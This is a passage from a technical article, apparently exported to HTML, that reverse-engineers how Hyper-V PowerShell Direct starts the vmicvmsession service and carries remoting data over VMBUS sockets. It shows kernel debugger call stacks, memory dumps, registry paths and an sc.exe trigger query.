<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">02 hvsocket!VmbusTlXPartIoRequestCompleted</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">03 nt!IopfCompleteRequest</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">04 hvsocket!VmbusTlFulfillReceiveRequest</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">05 hvsocket!VmbusTlDeliverSingleDataIndicationList</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">06 hvsocket!VmbusTlDeliverDataIndications</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">07 hvsocket!VmbusTlEndpointActionWorkQueueRoutine</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">08 NETIO!NetiopIoWorkItemRoutine</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">09 nt!IopProcessWorkItem</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">0a nt!ExpWorkerThread</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">0b nt!PspSystemThreadStartup</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">0c nt!KiStartSystemThread</span></div>
<br /><ol start="4" style="margin-bottom: 0pt; margin-top: 0pt;">
<li dir="ltr" style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; list-style-type: decimal; margin-left: -18pt; text-decoration: none; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: center;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">PowerShell Direct</span></div>
</li>
</ol>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Windows PowerShell has long supported the PowerShell Remoting protocol, which allows connecting to workstations and servers over the network for remote management and execution of arbitrary commands. PowerShell Remoting is described by Microsoft in the document [MS-PSRP], published within the Open Specifications program. PowerShell Direct uses the same protocol, but the data is delivered not over a TCP/IP network stack but over VMBUS.</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">PowerShell Direct uses the same cmdlets as PowerShell Remoting: Enter-PSSession, Invoke-PSSession and New-PSSession; only, instead of a computer name, the name of the virtual machine or its GUID is passed. </span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">The Hyper-V PowerShell Direct Service (service name vmicvmsession) was created to support this technology in the guest OS; its functionality is implemented in the %SystemRoot%\System32\ICSvc.dll library. Start type: Manual (Trigger start). Under what conditions is the service started?</span></div>
<br /><br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">PS C:\Users\Administrator> sc.exe qtriggerinfo vmicvmsession</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">[SC] QueryServiceConfig2 SUCCESS</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">SERVICE_NAME: vmicvmsession</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> START SERVICE</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> DEVICE INTERFACE ARRIVAL : </span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">999e53d4-3d5c-4c3e-8779-bed06ec056e1</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> [INTERFACE CLASS GUID] - HV_GUID_VM_SESSION_SERVICE_ID</span></div>
<br /><div dir="ltr" style="line-height: 1.26; margin-bottom: 8pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">It happens when a device with INTERFACE CLASS GUID</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;"> 999e53d4-3d5c-4c3e-8779-bed06ec056e1</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> is connected to the system. Evidently, the GUID of this device coincides with the service GUID from the registry key in the root OS (HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Virtualization\GuestCommunicationServices), where two keys with GUIDs</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;"> 999e53d4-3d5c-4c3e-8779-bed06ec056e1 and a5201c21-2770-4c11-a68e-f182edb29220</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> are created by default for working with sockets.</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">In the guest OS, devices with these GUIDs are present at</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\DeviceClasses\{999e53d4-3d5c-4c3e-8779-bed06ec056e1}</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\DeviceClasses\{a5201c21-2770-4c11-a68e-f182edb29220}\##?#ACPI#VMBus#0#{a5201c21-2770-4c11-a68e-f182edb29220}\#{a5201c21-2770-4c11-a68e-f182edb29220}-{00000000-0000-0000-0000-000000000000}-0000</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: center;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><img height="202" src="https://lh4.googleusercontent.com/dsYXXMFeoC1kSKY3QtqF7AlXvlEniMsM4SNtzP7LXqik5HfaEuTplfOlCqzM10RILtzwSDWHvB2AJg4jdm7M4inOh43oDIBhlJ2shFFiznhmeTQET1frE0Inp2nc0S5KeHpWFeQeN2Yvzv_QoA" style="-webkit-transform: rotate(0.00rad); border: none; transform: rotate(0.00rad);" width="624" /></span></div>
<br /><div dir="ltr" style="line-height: 1.26; margin-bottom: 8pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">The socket is initialized when one of the mentioned cmdlets is executed in the root OS; at the same time, in the guest OS the vmicvmsession service creates a Powershell.exe process and one Hyper-V socket. The data, converted to XML and Base64-encoded, are transferred by </span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">send</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> socket calls. The mechanism does not need to be enabled in the virtual machine settings and is available by default. Earlier, to learn the algorithm, researchers decompiled the System.Management.Automation.dll module, which is part of Windows PowerShell; now the situation is simpler, and the source code can be found on GitHub:</span></div>
<div dir="ltr" style="line-height: 1.26; margin-bottom: 8pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: underline; vertical-align: baseline;">(https://github.com/PowerShell/PowerShell/blob/master/src/System.Management.Automation/engine/remoting/common/RemoteSessionHyperVSocket.cs)</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">. </span></div>
<div dir="ltr" style="line-height: 1.26; margin-bottom: 8pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">A lot of information can be gathered there, in particular how to implement your own application that works with Hyper-V sockets in C#.</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Let's set symbolic breakpoints</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;"> nt!PnpNotif* </span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">in the guest OS; when Enter-PSSession is executed, we stop at nt!PnpNotifyDeviceClassChange.</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">kd> kcn</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"># Call Site</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">00 nt!PnpNotifyDeviceClassChange</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">01 nt!PnpDeviceEventWorker</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">02 nt!ExpWorkerThread</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">03 nt!PspSystemThreadStartup</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: #222222; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">VM Session Service 1 </span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">GUID is 2</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 4.8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: super;">nd</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> parameter:</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">kd> dd @rcx – 1</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 4.8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: super;">st</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;"> parameter, some GUID</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ffffa806`a2b5d6c8 cb3a4004 11d046f0 60008fb0 3f051397 </span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ffffa806`a2b5d6d8 00000002 00000000 00000000 00000000 </span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ffffa806`a2b5d6e8 00000000 00000164 00000000 00000000 </span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">kd> dd @rdx – 2</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 4.8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: super;">nd</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;"> parameter</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ffffa806`a2b5d6f8</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;"> 999e53d4 4c3e3d5c d0be7987 e156c06e </span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">kd> du @rdx+10 – at offset +10h is the ID of the device that appears on VMBUS</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ffffa806`a2b5d708 "\??\ACPI#VMBus#0#{999e53d4-3d5c-"</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ffffa806`a2b5d748 "4c3e-8779-bed06ec056e1}\{999e53d"</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ffffa806`a2b5d788 "4-3d5c-4c3e-8779-bed06ec056e1}-{"</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ffffa806`a2b5d7c8 "00000000-0000-0000-0000-00000000"</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ffffa806`a2b5d808 "0000}-0000"</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Nevertheless, this device is not displayed in the list of child vmbus devices (we can see that with !devnode 0 1). In the key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\VMBus this GUID is also absent. However, the DeviceInstance parameter</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">in the key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\DeviceClasses\{999e53d4-3d5c-4c3e-8779-bed06ec056e1}\##?#ACPI#VMBus#0#{999e53d4-3d5c-4c3e-8779-bed06ec056e1} has the value ACPI\VMBUS\0, which exactly coincides with the Device Instance value of the vmbus device.</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Also, when Enter-PSSession is executed, the vmbus!RootAddDeviceInterface function and nt!IoRegisterDeviceInterface run:</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">kd> kcn</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> # Call Site</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">00 nt!IoRegisterDeviceInterface</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">01 Wdf01000!Mx::MxRegisterDeviceInterface</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">02 Wdf01000!FxDeviceInterface::Register</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">03 Wdf01000!FxDeviceInterface::Register</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">04 Wdf01000!imp_WdfDeviceCreateDeviceInterface</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">05 vmbus!RootStartDeviceInterfaceByContext</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">06 hvsocket!VmbusTlXPartProcessNewConnection</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">07 vmbus!RootNotifyDeviceInterfaceArrival</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">08 Wdf01000!FxWorkItem::WorkItemHandler</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">09 Wdf01000!FxWorkItem::WorkItemThunk</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">0a nt!IopProcessWorkItem</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">0b nt!ExpWorkerThread</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">0c nt!PspSystemThreadStartup</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">0d nt!KiStartSystemThread</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">The last function is documented on MSDN:</span></div>
<br /><br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">NTSTATUS IoRegisterDeviceInterface(</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> _In_ PDEVICE_OBJECT PhysicalDeviceObject,</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> _In_ </span><span style="background-color: transparent; color: blue; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">const</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> GUID *InterfaceClassGuid,</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> _In_opt_ PUNICODE_STRING ReferenceString,</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> _Out_ PUNICODE_STRING SymbolicLinkName</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">);</span></div>
<br /><br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">kd> !devobj @rcx - </span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">PhysicalDeviceObject</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Device object (ffffc9094ca24630) is for:</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> 00000013 \Driver\ACPI DriverObject ffffc9094cdeea00</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
